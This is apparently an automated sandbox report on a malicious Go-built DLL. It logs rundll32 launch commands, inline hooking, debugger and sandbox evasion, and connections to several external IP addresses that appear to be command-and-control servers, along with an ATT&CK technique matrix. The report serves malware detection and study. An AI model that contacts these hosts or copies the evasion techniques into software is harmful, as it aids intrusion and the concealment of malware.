Source: rundll32.exe, 00000005.00000002.3935276148.000000000DA06000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://195.2.70.38http://91.142.74.28http://77.238.229.6377.238.250.123:80
Source: rundll32.exe, 00000007.00000002.3931954299.000000000D45A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://77.238.224.56
Source: rundll32.exe, 00000007.00000002.3931954299.000000000D414000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://77.238.224.56Go-http-client/1.1Go-http-client/1.1Go-http-client/1.1P
Source: rundll32.exe, 00000005.00000002.3932347032.000000000D808000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://77.238.224.56Go-http-client/1.1PM
Source: rundll32.exe, 00000004.00000002.3932131837.000000000D140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://77.238.224.56Go-http-client/1.1http://77.238.229.6377.238.250.123:80Go-http-client/1.1If-Modi
Source: rundll32.exe, 00000004.00000002.3932131837.000000000D0A2000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3934227145.000000000D90C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://77.238.224.56PM
Source: rundll32.exe, 00000005.00000002.3934857035.000000000D9AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://77.238.224.56http://77.238.229.6377.238.250.123:80185.231.155.234:205291P
Source: rundll32.exe, 00000004.00000002.3932131837.000000000D140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://77.238.224.56http://91.142.74.28
Source: rundll32.exe, 00000007.00000002.3931954299.000000000D45A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://77.238.229.63
Source: rundll32.exe, 00000004.00000002.3932131837.000000000D012000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3932347032.000000000D88C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://77.238.229.6377.238.250.123:80
Source: rundll32.exe, 00000004.00000002.3935140896.000000000D20C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://77.238.229.6377.238.250.123:80Go-http-client/1.1X-Content-Type-OptionsTransfer-Encodinghttp:/
Source: rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://77.238.229.6377.238.250.123:80Go-http-client/1.1http://195.2.70.38Go-http-client/1.1http://91
Source: rundll32.exe, 00000004.00000002.3932131837.000000000D012000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3932131837.000000000D0A2000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3932347032.000000000D88C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://77.238.229.6377.238.250.123:80PM
Source: rundll32.exe, 00000007.00000002.3934146478.000000000D60C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://77.238.229.6377.238.250.123:80http://195.2.70.38http://91.142.74.28http://77.238.224.56PM
Source: rundll32.exe, 00000007.00000002.3934146478.000000000D60C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://77.238.229.6377.238.250.123:80v
Source: rundll32.exe, 00000007.00000002.3931954299.000000000D464000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D663000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3931954299.000000000D45A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://77.238.250.123
Source: rundll32.exe, 00000005.00000002.3932347032.000000000D8AE000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4F0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3931954299.000000000D464000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D663000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3931954299.000000000D45A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://77.238.250.123http://195.2.70.38
Source: rundll32.exe, 00000007.00000002.3931954299.000000000D45A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.142.74.28
Source: rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.142.74.28Go-http-client/1.1http://77.238.224.56PM
Source: rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.142.74.28N
Source: rundll32.exe, 00000004.00000002.3932131837.000000000D0A2000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3934227145.000000000D90C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3932347032.000000000D88C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.142.74.28PM
Source: rundll32.exe, 00000005.00000002.3935276148.000000000DA06000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.142.74.28http://77.238.224.56PM
Source: file.dllString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: file.dllString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: file.dllString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.dllString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: file.dllString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.dllString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: file.dllString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: file.dllString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: file.dllString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.dllString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: file.dllString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: file.dllString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: file.dllString found in binary or memory: http://ocsp.digicert.com0A
Source: file.dllString found in binary or memory: http://ocsp.digicert.com0C
Source: file.dllString found in binary or memory: http://ocsp.digicert.com0N
Source: file.dllString found in binary or memory: http://ocsp.digicert.com0X
Source: file.dllString found in binary or memory: http://www.digicert.com/CPS0
Source: file.dllString found in binary or memory: https://www.digicert.com/CPS0
Source: file.dllStatic PE information: invalid certificate
Source: file.dllStatic PE information: Number of sections : 12 > 10
Source: file.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
Source: classification engineClassification label: mal76.evad.winDLL@14/1@0/6
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\configJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_03
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1
Source: file.dllReversingLabs: Detection: 13%
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\file.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,MainFunc
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,_cgo_dummy_export
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",MainFunc
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",_cgo_dummy_export
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,MainFuncJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,_cgo_dummy_exportJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",MainFuncJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",_cgo_dummy_exportJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: file.dllStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: file.dllStatic PE information: Image base 0x6c2c0000 > 0x60000000
Source: file.dllStatic file information: File size 13860360 > 1048576
Source: file.dllStatic PE information: Raw size of .rdata2 is bigger than: 0x100000 < 0xd32a00
Source: file.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: initial sampleStatic PE information: section where entry point is pointing to: .rdata2
Source: file.dllStatic PE information: section name: .rdata0
Source: file.dllStatic PE information: section name: .rdata1
Source: file.dllStatic PE information: section name: .rdata2

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 4128 base: 1420005 value: E9 8B 2F AD 75 Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 4128 base: 76EF2F90 value: E9 7A D0 52 8A Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1216 base: 2B10005 value: E9 8B 2F 3E 74 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1216 base: 76EF2F90 value: E9 7A D0 C1 8B Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6580 base: 3350005 value: E9 8B 2F BA 73 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6580 base: 76EF2F90 value: E9 7A D0 45 8C Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6292 base: 23E0005 value: E9 8B 2F B1 74 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6292 base: 76EF2F90 value: E9 7A D0 4E 8B Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6516 base: 32F0005 value: E9 8B 2F C0 73 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6516 base: 76EF2F90 value: E9 7A D0 3F 8C Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1276 base: 2DA0005 value: E9 8B 2F 15 74 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1276 base: 76EF2F90 value: E9 7A D0 EA 8B Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6C7ED9ED
Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6BFB2765
Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6CB06499
Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6BF71233
Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6C7E93AF
Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6C16B08D
Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6CBDAB20
Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6BF5D226
Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6BF34C05
Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6C01770E
Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6BF846CE
Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6C1AF1A2
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
Source: rundll32.exe, 00000007.00000002.3931248896.0000000003076000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln
Source: loaddll32.exe, 00000000.00000002.3371698348.000000000145E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3931317266.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3931346875.000000000337A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2199335619.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\loaddll32.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 77.238.229.63 80Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 195.2.70.38 80Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 77.238.224.56 80Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 91.142.74.28 80Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.231.155.234 20529Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 77.238.250.123 80Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\config VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\config VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\config VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
111
Process Injection
1
Masquerading
1
Credential API Hooking
111
Security Software Discovery
Remote Services1
Credential API Hooking
1
Non-Standard Port
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
11
Virtualization/Sandbox Evasion
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)111
Process Injection
Security Account Manager11
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Rundll32
NTDS111
System Information Discovery
Distributed Component Object ModelInput Capture1
Proxy
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1473486 Sample: file.dll Startdate: 15/07/2024 Architecture: WINDOWS Score: 76 29 Snort IDS alert for network traffic 2->29 31 Multi AV Scanner detection for submitted file 2->31 7 loaddll32.exe 1 2->7         started        process3 signatures4 37 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 7->37 39 Switches to a custom stack to bypass stack traces 7->39 10 rundll32.exe 1 7->10         started        14 rundll32.exe 7->14         started        16 cmd.exe 1 7->16         started        18 3 other processes 7->18 process5 dnsIp6 23 91.142.74.28, 49709, 49710, 49718 VTSL1-ASRU Russian Federation 10->23 25 185.231.155.234, 20529, 49770 VDSINA-ASRU Russian Federation 10->25 27 4 other IPs or domains 10->27 41 System process connects to network (likely due to code injection or exploit) 10->41 43 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 10->43 45 Found Tor onion address 10->45 20 rundll32.exe 16->20         started        signatures7 process8 signatures9 33 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 20->33 35 Found Tor onion address 20->35

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
file.dll14%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://77.238.229.6377.238.250.123:80Go-http-client/1.1X-Content-Type-OptionsTransfer-Encodinghttp:/0%Avira URL Cloudsafe
http://77.238.224.56PM0%Avira URL Cloudsafe
http://77.238.229.6377.238.250.123:80Go-http-client/1.1http://195.2.70.38Go-http-client/1.1http://910%Avira URL Cloudsafe
http://77.238.229.6377.238.250.123:80http://195.2.70.38http://91.142.74.28http://77.238.224.56PM0%Avira URL Cloudsafe
http://195.2.70.38PM0%Avira URL Cloudsafe
http://77.238.224.56http://77.238.229.6377.238.250.123:80185.231.155.234:205291P0%Avira URL Cloudsafe
http://77.238.229.6377.238.250.123:80PM0%Avira URL Cloudsafe
http://195.2.70.38http://91.142.74.28G0%Avira URL Cloudsafe
http://77.238.229.63/0%Avira URL Cloudsafe
http://77.238.224.560%Avira URL Cloudsafe
http://77.238.224.56http://91.142.74.280%Avira URL Cloudsafe
http://91.142.74.28http://77.238.224.56PM0%Avira URL Cloudsafe
http://77.238.224.56Go-http-client/1.1PM0%Avira URL Cloudsafe
http://195.2.70.38/0%Avira URL Cloudsafe
http://91.142.74.28N0%Avira URL Cloudsafe
http://77.238.250.123/0%Avira URL Cloudsafe
http://195.2.70.38http://91.142.74.28http://77.238.229.6377.238.250.123:800%Avira URL Cloudsafe
http://77.238.224.56/0%Avira URL Cloudsafe
http://77.238.229.630%Avira URL Cloudsafe
http://77.238.250.1230%Avira URL Cloudsafe
http://77.238.224.56Go-http-client/1.1Go-http-client/1.1Go-http-client/1.1P0%Avira URL Cloudsafe
http://91.142.74.28Go-http-client/1.1http://77.238.224.56PM0%Avira URL Cloudsafe
http://77.238.250.123http://195.2.70.380%Avira URL Cloudsafe
http://77.238.224.56Go-http-client/1.1http://77.238.229.6377.238.250.123:80Go-http-client/1.1If-Modi0%Avira URL Cloudsafe
http://77.238.229.6377.238.250.123:80v0%Avira URL Cloudsafe
http://91.142.74.28PM0%Avira URL Cloudsafe
http://91.142.74.28/0%Avira URL Cloudsafe
http://77.238.229.6377.238.250.123:800%Avira URL Cloudsafe
http://195.2.70.38Go-http-client/1.1PM0%Avira URL Cloudsafe
http://195.2.70.38P0%Avira URL Cloudsafe
http://91.142.74.280%Avira URL Cloudsafe
http://195.2.70.380%Avira URL Cloudsafe

Download Network PCAP: filteredfull

No contacted domains info
NameMaliciousAntivirus DetectionReputation
http://77.238.229.63/true
  • Avira URL Cloud: safe
unknown
http://195.2.70.38/true
  • Avira URL Cloud: safe
unknown
http://77.238.250.123/true
  • Avira URL Cloud: safe
unknown
http://77.238.224.56/true
  • Avira URL Cloud: safe
unknown
http://91.142.74.28/true
  • Avira URL Cloud: safe
unknown
NameSourceMaliciousAntivirus DetectionReputation
http://77.238.224.56PMrundll32.exe, 00000004.00000002.3932131837.000000000D0A2000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3934227145.000000000D90C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://77.238.224.56http://77.238.229.6377.238.250.123:80185.231.155.234:205291Prundll32.exe, 00000005.00000002.3934857035.000000000D9AC000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://77.238.229.6377.238.250.123:80Go-http-client/1.1http://195.2.70.38Go-http-client/1.1http://91rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://195.2.70.38PMrundll32.exe, 00000004.00000002.3932131837.000000000D140000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3932347032.000000000D808000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3934227145.000000000D90C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3931954299.000000000D414000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://195.2.70.38http://91.142.74.28Grundll32.exe, 00000004.00000002.3932131837.000000000D012000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://77.238.229.6377.238.250.123:80http://195.2.70.38http://91.142.74.28http://77.238.224.56PMrundll32.exe, 00000007.00000002.3934146478.000000000D60C000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://77.238.229.6377.238.250.123:80PMrundll32.exe, 00000004.00000002.3932131837.000000000D012000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3932131837.000000000D0A2000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3932347032.000000000D88C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://77.238.229.6377.238.250.123:80Go-http-client/1.1X-Content-Type-OptionsTransfer-Encodinghttp:/rundll32.exe, 00000004.00000002.3935140896.000000000D20C000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://77.238.224.56rundll32.exe, 00000007.00000002.3931954299.000000000D45A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://77.238.224.56http://91.142.74.28rundll32.exe, 00000004.00000002.3932131837.000000000D140000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://77.238.224.56Go-http-client/1.1PMrundll32.exe, 00000005.00000002.3932347032.000000000D808000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://91.142.74.28Nrundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://91.142.74.28http://77.238.224.56PMrundll32.exe, 00000005.00000002.3935276148.000000000DA06000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://195.2.70.38http://91.142.74.28http://77.238.229.6377.238.250.123:80rundll32.exe, 00000005.00000002.3935276148.000000000DA06000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://77.238.229.63rundll32.exe, 00000007.00000002.3931954299.000000000D45A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://77.238.250.123rundll32.exe, 00000007.00000002.3931954299.000000000D464000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D663000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3931954299.000000000D45A000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://77.238.224.56Go-http-client/1.1Go-http-client/1.1Go-http-client/1.1Prundll32.exe, 00000007.00000002.3931954299.000000000D414000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://91.142.74.28Go-http-client/1.1http://77.238.224.56PMrundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://77.238.250.123http://195.2.70.38rundll32.exe, 00000005.00000002.3932347032.000000000D8AE000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4F0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3931954299.000000000D464000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D663000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3931954299.000000000D45A000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://77.238.229.6377.238.250.123:80vrundll32.exe, 00000007.00000002.3934146478.000000000D60C000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
